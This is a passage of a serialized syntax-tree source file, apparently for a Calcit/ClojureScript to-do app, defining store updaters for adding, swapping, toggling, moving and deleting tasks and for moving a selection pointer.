:at 1518019774756
:by |root
:id |HJPp4j_8z
|r $ {}
:data $ {}
|T $ {} (:text |all-sort-ids) (:type :leaf) (:at 1518019789911) (:by |root) (:id |H1WWRNsdUGleaf)
|j $ {}
:data $ {}
|T $ {} (:text |->) (:type :leaf) (:at 1629052597785) (:by |Qr5ffqtY) (:id |rk-IC4s_UM)
|j $ {}
:data $ {}
|T $ {} (:text |:tasks) (:type :leaf) (:at 1518019802945) (:by |root) (:id |ryb1SouLz)
|j $ {} (:text |store) (:type :leaf) (:at 1518019803592) (:by |root) (:id |SybmkBouIM)
:type :expr
:at 1518019801548
:by |root
:id |HyfyHo_8G
|l $ {}
:data $ {}
|T $ {} (:text |.to-list) (:type :leaf) (:at 1629052813635) (:by |Qr5ffqtY)
:type :expr
:at 1629052812195
:by |Qr5ffqtY
|n $ {}
:data $ {}
|T $ {} (:text |map) (:type :leaf) (:at 1629052816469) (:by |Qr5ffqtY) (:id |SJg5lrs_LM)
|j $ {} (:text |last) (:type :leaf) (:at 1629052817616) (:by |Qr5ffqtY)
:type :expr
:at 1518019826647
:by |root
:id |BJsgSsd8f
|t $ {}
:data $ {}
|T $ {} (:text |map) (:type :leaf) (:at 1518019830099) (:by |root) (:id |H1RxHsO8Mleaf)
|j $ {}
:data $ {}
|D $ {} (:text |fn) (:type :leaf) (:at 1629052614448) (:by |Qr5ffqtY)
|L $ {}
:data $ {}
|T $ {} (:text |x) (:type :leaf) (:at 1629052615199) (:by |Qr5ffqtY)
:type :expr
:at 1629052614844
:by |Qr5ffqtY
|T $ {}
:data $ {}
|T $ {} (:text |:sort-id) (:type :leaf) (:at 1518019832075) (:by |root) (:id |BkkbHouLM)
|j $ {} (:text |x) (:type :leaf) (:at 1629052619568) (:by |Qr5ffqtY)
:type :expr
:at 1629052616092
:by |Qr5ffqtY
:type :expr
:at 1629052613793
:by |Qr5ffqtY
:type :expr
:at 1518019829572
:by |root
:id |H1RxHsO8M
|w $ {}
:data $ {}
|T $ {} (:text |sort) (:type :leaf) (:at 1629052622721) (:by |Qr5ffqtY) (:id |rkLbSjO8Gleaf)
|j $ {} (:text |&compare) (:type :leaf) (:at 1629052629817) (:by |Qr5ffqtY)
:type :expr
:at 1518019837699
:by |root
:id |rkLbSjO8G
:type :expr
:at 1518019790383
:by |root
:id |r1zUREodUG
:type :expr
:at 1518019785163
:by |root
:id |H1WWRNsdUG
|v $ {}
:data $ {}
|T $ {} (:text |sort-id-after) (:type :leaf) (:at 1518019857468) (:by |root) (:id |ryxObHjdLfleaf)
|j $ {}
:data $ {}
|D $ {} (:text |first) (:type :leaf) (:at 1518020286235) (:by |root) (:id |ByX68idUM)
|T $ {}
:data $ {}
|T $ {} (:text |filter) (:type :leaf) (:at 1518019864779) (:by |root) (:id |HkcGSsO8M)
|j $ {} (:text |all-sort-ids) (:type :leaf) (:at 1518019869570) (:by |root) (:id |BJfbmHj_Uf)
|r $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1629052594857) (:by |Qr5ffqtY)
|j $ {}
:data $ {}
|T $ {} (:text |x) (:type :leaf) (:at 1629052594857) (:by |Qr5ffqtY)
:type :expr
:at 1629052594857
:by |Qr5ffqtY
|r $ {}
:data $ {}
|T $ {} (:text |>) (:type :leaf) (:at 1629052594857) (:by |Qr5ffqtY)
|j $ {} (:text |x) (:type :leaf) (:at 1629052594857) (:by |Qr5ffqtY)
|r $ {} (:text |base-sort-id) (:type :leaf) (:at 1629052594857) (:by |Qr5ffqtY)
:type :expr
:at 1629052594857
:by |Qr5ffqtY
:type :expr
:at 1629052594857
:by |Qr5ffqtY
:type :expr
:at 1518019858194
:by |root
:id |B1xcGSs_UM
:type :expr
:at 1518020281172
:by |root
:id |Byx-aLsdUM
:type :expr
:at 1518019840095
:by |root
:id |ryxObHjdLf
|x $ {}
:data $ {}
|T $ {} (:text |new-sort-id) (:type :leaf) (:at 1518019884403) (:by |root) (:id |rJ-zNSjOLzleaf)
|j $ {}
:data $ {}
|T $ {} (:text |bisect) (:type :leaf) (:at 1518019893729) (:by |root) (:id |rJzVEriuLf)
|j $ {}
:data $ {}
|D $ {} (:text |or) (:type :leaf) (:at 1631341677258) (:by |Qr5ffqtY)
|T $ {} (:text |base-sort-id) (:type :leaf) (:at 1518019921140) (:by |root) (:id |rJvIHiuIf)
|j $ {} (:text |mid-id) (:type :leaf) (:at 1631341680953) (:by |Qr5ffqtY)
:type :expr
:at 1631341675715
:by |Qr5ffqtY
|r $ {}
:data $ {}
|T $ {} (:text |or) (:type :leaf) (:at 1518019921977) (:by |root) (:id |Sk9UBjuUz)
|j $ {} (:text |sort-id-after) (:type :leaf) (:at 1518019925043) (:by |root) (:id |BJmc8SidLM)
|r $ {} (:text |max-id) (:type :leaf) (:at 1518019926860) (:by |root) (:id |B17TUSi_Lf)
:type :expr
:at 1518019921692
:by |root
:id |HkxqLBiuLG
:type :expr
:at 1518019884675
:by |root
:id |BySErou8G
:type :expr
:at 1518019882212
:by |root
:id |rJ-zNSjOLz
|y $ {}
:data $ {}
|T $ {} (:text |new-task) (:type :leaf) (:at 1518019934843) (:by |root) (:id |rJgHPBod8fleaf)
|j $ {}
:data $ {}
|T $ {} (:text |merge) (:type :leaf) (:at 1518019937568) (:by |root) (:id |BkQvwrouUz)
|j $ {} (:text |schema/task) (:type :leaf) (:at 1518019940023) (:by |root) (:id |ryg5DHjOIf)
|r $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1518020249946) (:by |root) (:id |H143vSjdUf)
|j $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1518019941363) (:by |root) (:id |Bk-TvSi_Uf)
|j $ {} (:text |op-id) (:type :leaf) (:at 1518019945262) (:by |root) (:id |H1IpDridUM)
:type :expr
:at 1518019940897
:by |root
:id |rkz6DridLz
|r $ {}
:data $ {}
|T $ {} (:text |:sort-id) (:type :leaf) (:at 1518019955533) (:by |root) (:id |ByWqOSsO8fleaf)
|j $ {} (:text |new-sort-id) (:type :leaf) (:at 1518019958918) (:by |root) (:id |BJghdHiO8G)
:type :expr
:at 1518019954234
:by |root
:id |ByWqOSsO8f
|v $ {}
:data $ {}
|T $ {} (:text |:created-time) (:type :leaf) (:at 1525887131985) (:by |root) (:id |SyWGolnxRzleaf)
|j $ {} (:text |op-time) (:type :leaf) (:at 1525887134307) (:by |root) (:id |HkNViehl0M)
:type :expr
:at 1525887130131
:by |root
:id |SyWGolnxRz
:type :expr
:at 1518019940354
:by |root
:id |rkShDHodIz
:type :expr
:at 1518019935240
:by |root
:id |ByNDDHoO8z
:type :expr
:at 1518019933345
:by |root
:id |rJgHPBod8f
:type :expr
:at 1518019760040
:by |root
:id |S1zunVsOLM
|T $ {}
:data $ {}
|T $ {} (:text |->) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkelIq99kArW)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJWgU5q9kCH-)
|r $ {}
:data $ {}
|T $ {} (:text |assoc-in) (:type :leaf) (:at 1518019974973) (:by |root) (:id |BJmxUqq91CrW)
|j $ {}
:data $ {}
|D $ {} (:text |[]) (:type :leaf) (:at 1518019979037) (:by |root) (:id |HymqSs_Iz)
|T $ {} (:text |:tasks) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJVx85q5kRSZ)
|j $ {} (:text |op-id) (:type :leaf) (:at 1518019981686) (:by |root) (:id |B14qSs_IM)
:type :expr
:at 1518019978110
:by |root
:id |SyzcSs_8G
|r $ {} (:text |new-task) (:type :leaf) (:at 1518019984448) (:by |root) (:id |ryGLcSjO8G)
:type :expr
:at 1500452996813
:by nil
:id |H1zl85q9JCrW
|v $ {}
:data $ {}
|T $ {} (:text |update) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1WNIqq5yCSW)
|j $ {} (:text |:pointer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyMVLc5q1ABb)
|r $ {} (:text |inc) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJ7NIc59JCHb)
:type :expr
:at 1500452996813
:by nil
:id |BJlEIcccyCB-
:type :expr
:at 1500452996813
:by nil
:id |By1lLq9qJ0BW
:type :expr
:at 1518019758856
:by |root
:id |r1eDhVsd8z
:type :expr
:at 1500452996813
:by nil
:id |Skd1U9551ArZ
|swap-tasks $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1518620833540) (:by |root) (:id |HyW5jxAbvz)
|j $ {} (:text |swap-tasks) (:type :leaf) (:at 1518620833540) (:by |root) (:id |rkfcog0bwz)
|r $ {}
:data $ {}
|T $ {} (:text |store) (:type :leaf) (:at 1518620837713) (:by |root) (:id |S1zoilRWPf)
|j $ {} (:text |op-data) (:type :leaf) (:at 1518620838856) (:by |root) (:id |By-0jg0ZPf)
:type :expr
:at 1518620833540
:by |root
:id |HJ7qjgC-wM
|v $ {}
:data $ {}
|T $ {} (:text |let-sugar) (:type :leaf) (:at 1629051954561) (:by |Qr5ffqtY) (:id |rJV12gA-Dzleaf)
|j $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518620841344) (:by |root) (:id |HJMehg0ZwM)
|j $ {} (:text |from-id) (:type :leaf) (:at 1518620844319) (:by |root) (:id |ryGnxCWvf)
|r $ {} (:text |to-id) (:type :leaf) (:at 1518620845368) (:by |root) (:id |B1GN2xAbPM)
|v $ {} (:text |new-pointer) (:type :leaf) (:at 1519747944799) (:by |root) (:id |BJbyuXWm_z)
:type :expr
:at 1518620840860
:by |root
:id |SyZnxCZDf
|j $ {} (:text |op-data) (:type :leaf) (:at 1518620848313) (:by |root) (:id |Hkv2xA-vf)
:type :expr
:at 1518620840426
:by |root
:id |SkNlngRZPf
:type :expr
:at 1518620840295
:by |root
:id |BkmxnxAWwf
|r $ {}
:data $ {}
|D $ {} (:text |->) (:type :leaf) (:at 1519747948476) (:by |root) (:id |Bkb7d7b7OG)
|L $ {} (:text |store) (:type :leaf) (:at 1519747949557) (:by |root) (:id |rkr_7WX_M)
|P $ {}
:data $ {}
|T $ {} (:text |assoc) (:type :leaf) (:at 1519747951443) (:by |root) (:id |SJZUOXZQOz)
|j $ {} (:text |:pointer) (:type :leaf) (:at 1519747953001) (:by |root) (:id |H1_u7Wm_M)
|r $ {} (:text |new-pointer) (:type :leaf) (:at 1519747955401) (:by |root) (:id |HJNt_mbX_z)
:type :expr
:at 1519747950217
:by |root
:id |ryf8uQZXuf
|T $ {}
:data $ {}
|T $ {} (:text |update) (:type :leaf) (:at 1518620879685) (:by |root) (:id |SkWt2eAbDMleaf)
|r $ {} (:text |:tasks) (:type :leaf) (:at 1518620882374) (:by |root) (:id |B1VF0lAbwz)
|v $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1518620884643) (:by |root) (:id |SJsClCWDG)
|j $ {}
:data $ {}
|T $ {} (:text |tasks) (:type :leaf) (:at 1518620886219) (:by |root) (:id |HyepRxAWvz)
:type :expr
:at 1518620884982
:by |root
:id |BJW6CgRWwG
|r $ {}
:data $ {}
|D $ {} (:text |->) (:type :leaf) (:at 1518620930488) (:by |root) (:id |S1ltWZC-vG)
|L $ {} (:text |tasks) (:type :leaf) (:at 1518620931335) (:by |root) (:id |B1jZWAZvf)
|T $ {}
:data $ {}
|T $ {} (:text |assoc-in) (:type :leaf) (:at 1518620895586) (:by |root) (:id |Skgkk-CbwMleaf)
|r $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518620897000) (:by |root) (:id |SytJWAZvM)
|j $ {} (:text |from-id) (:type :leaf) (:at 1518620903616) (:by |root) (:id |H1XKJb0bDf)
|r $ {} (:text |:sort-id) (:type :leaf) (:at 1518620911197) (:by |root) (:id |SkexgWA-vM)
:type :expr
:at 1518620896688
:by |root
:id |r1gKy-0bDf
|v $ {}
:data $ {}
|T $ {} (:text |get-in) (:type :leaf) (:at 1518620919386) (:by |root) (:id |ryx_l-A-vz)
|j $ {} (:text |tasks) (:type :leaf) (:at 1518620916679) (:by |root) (:id |HJ2g-0-Dz)
|r $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518620920531) (:by |root) (:id |r1ggWZA-wz)
|j $ {} (:text |to-id) (:type :leaf) (:at 1518620922504) (:by |root) (:id |r1eZ--R-DG)
|r $ {} (:text |:sort-id) (:type :leaf) (:at 1518620924374) (:by |root) (:id |rkXZ-C-vG)
:type :expr
:at 1518620920212
:by |root
:id |SkZgbbRZvf
:type :expr
:at 1518620912928
:by |root
:id |BkFgbA-Df
:type :expr
:at 1518620887467
:by |root
:id |Skgkk-CbwM
|j $ {}
:data $ {}
|T $ {} (:text |assoc-in) (:type :leaf) (:at 1518620895586) (:by |root) (:id |Skgkk-CbwMleaf)
|r $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518620897000) (:by |root) (:id |SytJWAZvM)
|j $ {} (:text |to-id) (:type :leaf) (:at 1518620936796) (:by |root) (:id |H1XKJb0bDf)
|r $ {} (:text |:sort-id) (:type :leaf) (:at 1518620911197) (:by |root) (:id |SkexgWA-vM)
:type :expr
:at 1518620896688
:by |root
:id |r1gKy-0bDf
|v $ {}
:data $ {}
|T $ {} (:text |get-in) (:type :leaf) (:at 1518620919386) (:by |root) (:id |ryx_l-A-vz)
|j $ {} (:text |tasks) (:type :leaf) (:at 1518620916679) (:by |root) (:id |HJ2g-0-Dz)
|r $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518620920531) (:by |root) (:id |r1ggWZA-wz)
|j $ {} (:text |from-id) (:type :leaf) (:at 1518620939025) (:by |root) (:id |r1eZ--R-DG)
|r $ {} (:text |:sort-id) (:type :leaf) (:at 1518620924374) (:by |root) (:id |rkXZ-C-vG)
:type :expr
:at 1518620920212
:by |root
:id |SkZgbbRZvf
:type :expr
:at 1518620912928
:by |root
:id |BkFgbA-Df
:type :expr
:at 1518620887467
:by |root
:id |Sk0WWCbwz
:type :expr
:at 1518620928930
:by |root
:id |SJt-ZAWPf
:type :expr
:at 1518620882786
:by |root
:id |Skeo0xCWPf
:type :expr
:at 1518620849375
:by |root
:id |SkWt2eAbDM
:type :expr
:at 1519747947188
:by |root
:id |HJx7_7-QOG
:type :expr
:at 1518620839195
:by |root
:id |rJV12gA-Dz
:type :expr
:at 1518620833540
:by |root
:id |H1eqjxAWDG
|updater $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Sk1fSq9ckCBZ)
|j $ {} (:text |updater) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ByezB9c5y0SZ)
|r $ {}
:data $ {}
|T $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HyzfS9q5kCSZ)
|j $ {} (:text |op) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJ7GH99ck0BW)
|r $ {} (:text |op-data) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HyVGSqc51RH-)
|t $ {} (:text |op-id) (:type :leaf) (:at 1518019353393) (:by |root) (:id |SkxlmXo_If)
|v $ {} (:text |op-time) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rkSGrccq10rZ)
:type :expr
:at 1500452996813
:by nil
:id |ryWzH9qcyRBb
|v $ {}
:data $ {}
|yxT $ {}
:data $ {}
|T $ {} (:text |:task/move) (:type :leaf) (:at 1518020794164) (:by |root) (:id |Bkl6dsOUzleaf)
|j $ {}
:data $ {}
|T $ {} (:text |move-task) (:type :leaf) (:at 1518020796500) (:by |root) (:id |rJSGTdjuLM)
|j $ {} (:text |store) (:type :leaf) (:at 1518020797700) (:by |root) (:id |rkBTusdIM)
|r $ {} (:text |op-data) (:type :leaf) (:at 1518020798754) (:by |root) (:id |rkG86OjOIf)
:type :expr
:at 1518020794587
:by |root
:id |rkX6ujdLG
:type :expr
:at 1518020791694
:by |root
:id |Bkl6dsOUz
|yxj $ {}
:data $ {}
|T $ {} (:text |:task/swap) (:type :leaf) (:at 1518620829279) (:by |root) (:id |Bkl6dsOUzleaf)
|j $ {}
:data $ {}
|T $ {} (:text |swap-tasks) (:type :leaf) (:at 1518620831260) (:by |root) (:id |rJSGTdjuLM)
|j $ {} (:text |store) (:type :leaf) (:at 1518020797700) (:by |root) (:id |rkBTusdIM)
|r $ {} (:text |op-data) (:type :leaf) (:at 1518020798754) (:by |root) (:id |rkG86OjOIf)
:type :expr
:at 1518020794587
:by |root
:id |rkX6ujdLG
:type :expr
:at 1518020791694
:by |root
:id |rJmjgC-vz
|yyT $ {}
:data $ {}
|T $ {} (:text |:pointer/before) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJCUS59qJRBW)
|j $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SklvBc95yCBW)
|j $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1629052346600) (:by |Qr5ffqtY) (:id |HJfwHqc9yCrb)
|b $ {} (:text |0) (:type :leaf) (:at 1629052347052) (:by |Qr5ffqtY)
|j $ {}
:data $ {}
|T $ {} (:text |:pointer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJVDrc9qkRHb)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SkSvH5c9kAr-)
:type :expr
:at 1500452996813
:by nil
:id |SkQvrq99JAB-
:type :expr
:at 1500452996813
:by nil
:id |B1bvrqq91CS-
|r $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ByUDBq59kArb)
|v $ {}
:data $ {}
|T $ {} (:text |update) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJdvrqqcyCSb)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1tDHqq51CSb)
|r $ {} (:text |:pointer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1qvr555yCSZ)
|v $ {} (:text |dec) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1jDSccqyArW)
:type :expr
:at 1500452996813
:by nil
:id |r1DPSqc5yABZ
:type :expr
:at 1500452996813
:by nil
:id |SyywBqq510S-
:type :expr
:at 1500452996813
:by nil
:id |By68r5ccJ0rZ
|yyj $ {}
:data $ {}
|T $ {} (:text |:pointer/after) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkdSS5qcJRHb)
|j $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJ9Sr9c5kCHb)
|j $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ry2Brcq9yCBb)
|j $ {}
:data $ {}
|T $ {} (:text |:pointer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B10Brcc5JRSZ)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1JUr55qkAH-)
:type :expr
:at 1500452996813
:by nil
:id |SypHBc99JRBW
|r $ {}
:data $ {}
|T $ {} (:text |dec) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rkbIr5cqJ0BW)
|j $ {}
:data $ {}
|T $ {} (:text |count) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SkQ8Hc9q10B-)
|j $ {}
:data $ {}
|T $ {} (:text |:tasks) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1S8ScccyRHW)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkULScc51AHb)
:type :expr
:at 1500452996813
:by nil
:id |BkNISc591AHb
:type :expr
:at 1500452996813
:by nil
:id |rkGIr599y0rW
:type :expr
:at 1500452996813
:by nil
:id |SJxLr55qyAHZ
:type :expr
:at 1500452996813
:by nil
:id |B1jSS9c51CSb
|r $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Syv8Bcq5JABZ)
|v $ {}
:data $ {}
|T $ {} (:text |update) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1F8SccqkABb)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Byc8Sc5cJCSZ)
|r $ {} (:text |:pointer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Byi8S555kASb)
|v $ {} (:text |inc) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyhLBq99J0BW)
:type :expr
:at 1500452996813
:by nil
:id |HkuUHqc5JRrZ
:type :expr
:at 1500452996813
:by nil
:id |BJFBr9q510SW
:type :expr
:at 1500452996813
:by nil
:id |HJDrHqq5JRHb
|yyp $ {}
:data $ {}
|T $ {} (:text |:mark/dragging) (:type :leaf) (:at 1518169554211) (:by |root) (:id |r1q0pJoLMleaf)
|j $ {}
:data $ {}
|T $ {} (:text |assoc) (:type :leaf) (:at 1518169568634) (:by |root) (:id |rkoAaksUG)
|j $ {} (:text |store) (:type :leaf) (:at 1518169569234) (:by |root) (:id |SyZK1R1j8M)
|r $ {} (:text |:dragging-id) (:type :leaf) (:at 1518169571573) (:by |root) (:id |ByDYJAyo8M)
|v $ {} (:text |op-data) (:type :leaf) (:at 1518169734159) (:by |root) (:id |Byxny0ks8z)
:type :expr
:at 1518169567228
:by |root
:id |BJv10kiLG
:type :expr
:at 1518169553760
:by |root
:id |r1q0pJoLM
|yys $ {}
:data $ {}
|T $ {} (:text |:mark/dropping) (:type :leaf) (:at 1519749496649) (:by |root) (:id |r1q0pJoLMleaf)
|j $ {}
:data $ {}
|T $ {} (:text |assoc) (:type :leaf) (:at 1518169568634) (:by |root) (:id |rkoAaksUG)
|j $ {} (:text |store) (:type :leaf) (:at 1518169569234) (:by |root) (:id |SyZK1R1j8M)
|r $ {} (:text |:dropping-id) (:type :leaf) (:at 1519749494402) (:by |root) (:id |ByDYJAyo8M)
|v $ {} (:text |op-data) (:type :leaf) (:at 1518169734159) (:by |root) (:id |Byxny0ks8z)
:type :expr
:at 1518169567228
:by |root
:id |BJv10kiLG
:type :expr
:at 1518169553760
:by |root
:id |rkhut-X_G
|yyt $ {}
:data $ {}
|T $ {} (:text |:hydrate-storage) (:type :leaf) (:at 1553876001074) (:by |root) (:id |yodeLMPWRleaf)
|j $ {} (:text |op-data) (:type :leaf) (:at 1553876006965) (:by |root) (:id |oBagOsv9Y-)
:type :expr
:at 1553875945617
:by |root
:id |yodeLMPWR
|yr $ {}
:data $ {}
|T $ {} (:text |:task/toggle) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJYfS55cyCSb)
|v $ {}
:data $ {}
|T $ {} (:text |update-in) (:type :leaf) (:at 1525887188278) (:by |root) (:id |HJoAe2gRMleaf)
|j $ {} (:text |store) (:type :leaf) (:at 1525887190374) (:by |root) (:id |rkTCg3g0f)
|r $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1525887190794) (:by |root) (:id |HkE00enlRf)
|j $ {} (:text |:tasks) (:type :leaf) (:at 1525887191546) (:by |root) (:id |r17yJ-hx0M)
|r $ {} (:text |op-data) (:type :leaf) (:at 1525887192944) (:by |root) (:id |HJlgJWhlRf)
:type :expr
:at 1525887190614
:by |root
:id |S1kyW2xAM
|v $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1525887194256) (:by |root) (:id |ByH-kbneRM)
|j $ {}
:data $ {}
|T $ {} (:text |task) (:type :leaf) (:at 1525887196524) (:by |root) (:id |SkGMyb3e0f)
:type :expr
:at 1525887194525
:by |root
:id |BJQ1Z2eAz
|r $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1525887206092) (:by |root) (:id |rJxDybhgRzleaf)
|j $ {}
:data $ {}
|T $ {} (:text |:done?) (:type :leaf) (:at 1525887211513) (:by |root) (:id |S1WC1WneCM)
|j $ {} (:text |task) (:type :leaf) (:at 1525887216012) (:by |root) (:id |rJLx-hl0G)
:type :expr
:at 1525887206484
:by |root
:id |SJMCkWhgCf
|r $ {}
:data $ {}
|T $ {} (:text |assoc) (:type :leaf) (:at 1525887218137) (:by |root) (:id |r1YlZhxRGleaf)
|j $ {} (:text |task) (:type :leaf) (:at 1525887221771) (:by |root) (:id |r1V9eZ3g0f)
|r $ {} (:text |:done?) (:type :leaf) (:at 1525887223245) (:by |root) (:id |BJxRg-3e0z)
|v $ {} (:text |false) (:type :leaf) (:at 1525887224965) (:by |root) (:id |SylW-3l0f)
:type :expr
:at 1525887217231
:by |root
:id |r1YlZhxRG
|v $ {}
:data $ {}
|T $ {} (:text |->) (:type :leaf) (:at 1525887226573) (:by |root) (:id |Hkz--hxRfleaf)
|j $ {} (:text |task) (:type :leaf) (:at 1525887228278) (:by |root) (:id |SygQZWhxAG)
|r $ {}
:data $ {}
|T $ {} (:text |assoc) (:type :leaf) (:at 1525887229713) (:by |root) (:id |HkEEZ-hlAG)
|j $ {} (:text |:done?) (:type :leaf) (:at 1525887231714) (:by |root) (:id |rkDZZneRz)
|r $ {} (:text |true) (:type :leaf) (:at 1525887232359) (:by |root) (:id |ryldW-nl0M)
:type :expr
:at 1525887228559
:by |root
:id |SyS-WhgRz
|v $ {}
:data $ {}
|T $ {} (:text |assoc) (:type :leaf) (:at 1525887237310) (:by |root) (:id |Skgt-WnxRfleaf)
|j $ {} (:text |:done-time) (:type :leaf) (:at 1526924091476) (:by |root) (:id |S146WbheCM)
|r $ {} (:text |op-time) (:type :leaf) (:at 1525887242924) (:by |root) (:id |BygbMbngRf)
:type :expr
:at 1525887232983
:by |root
:id |Skgt-WnxRf
:type :expr
:at 1525887225702
:by |root
:id |Hkz--hxRf
:type :expr
:at 1525887198826
:by |root
:id |rJxDybhgRz
:type :expr
:at 1525887193942
:by |root
:id |BJM1WhgAz
:type :expr
:at 1525887186651
:by |root
:id |HJoAe2gRM
:type :expr
:at 1500452996813
:by nil
:id |HJ_Mr9cckCBb
|yw $ {}
:data $ {}
|T $ {} (:text |:task/relax) (:type :leaf) (:at 1527734632311) (:by |root) (:id |B1-kdR2p-leaf)
|b $ {}
:data $ {}
|T $ {} (:text |relax-tasks) (:type :leaf) (:at 1527734644525) (:by |root) (:id |rye4yFRha-)
|j $ {} (:text |store) (:type :leaf) (:at 1508858085410) (:by |root) (:id |SknJFA36-)
|n $ {} (:text |op-id) (:type :leaf) (:at 1525887639204) (:by |root) (:id |SyR9fhgCf)
|r $ {} (:text |op-time) (:type :leaf) (:at 1525887367524) (:by |root) (:id |S1xTKb2eAM)
:type :expr
:at 1508858076726
:by |root
:id |SyryKAhTW
:type :expr
:at 1508857816526
:by |root
:id |B1-kdR2p-
|yx $ {}
:data $ {}
|T $ {} (:text |:task/delete) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ryWHSqcc1AHW)
|j $ {}
:data $ {}
|T $ {} (:text |delete-task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rkQrBc591CSb)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJNHr999kRBZ)
|r $ {} (:text |op-data) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkBSSc591CB-)
:type :expr
:at 1500452996813
:by nil
:id |HkGrH59c10B-
:type :expr
:at 1500452996813
:by nil
:id |HJlBr99cyAr-
|yy $ {}
:data $ {}
|T $ {} (:text |:pointer/touch) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1v5B9591CS-)
|j $ {}
:data $ {}
|T $ {} (:text |assoc) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rkt9Bq9qk0SW)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJqqHq5ck0HW)
|r $ {} (:text |:pointer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyjqS955kCrW)
|v $ {} (:text |op-data) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hy3cH9951RHb)
:type :expr
:at 1500452996813
:by nil
:id |Hyu9H5cckRHW
:type :expr
:at 1500452996813
:by nil
:id |rJL9S5c51CrW
|T $ {} (:text |case-default) (:type :leaf) (:at 1629051844923) (:by |Qr5ffqtY) (:id |B1wGSqccyRBZ)
|j $ {} (:text |op) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkqmScc5JABW)
|n $ {}
:data $ {}
|D $ {} (:text |do) (:type :leaf) (:at 1629051847133) (:by |Qr5ffqtY)
|L $ {}
:data $ {}
|T $ {} (:text |println) (:type :leaf) (:at 1629051849139) (:by |Qr5ffqtY)
|j $ {} (:text "|\"Unknown op:") (:type :leaf) (:at 1629051852263) (:by |Qr5ffqtY)
|r $ {} (:text |op) (:type :leaf) (:at 1629051853488) (:by |Qr5ffqtY)
:type :expr
:at 1629051847469
:by |Qr5ffqtY
|T $ {} (:text |store) (:type :leaf) (:at 1629051845730) (:by |Qr5ffqtY)
:type :expr
:at 1629051846106
:by |Qr5ffqtY
|r $ {}
:data $ {}
|T $ {} (:text |:states) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJaDB5ccJCHZ)
|j $ {}
:data $ {}
|T $ {} (:text |update-states) (:type :leaf) (:at 1629051825841) (:by |Qr5ffqtY) (:id |ryk_r59c10HZ)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1gdH955kCBb)
|v $ {} (:text |op-data) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJ4dr9c51AH-)
:type :expr
:at 1500452996813
:by nil
:id |rkRwrq991Crb
:type :expr
:at 1500452996813
:by nil
:id |H13Prqq5J0SW
|v $ {}
:data $ {}
|T $ {} (:text |:task/add-before) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1X4Hq9cJAHZ)
|j $ {}
:data $ {}
|T $ {} (:text |add-before) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkrNHc95kCBb)
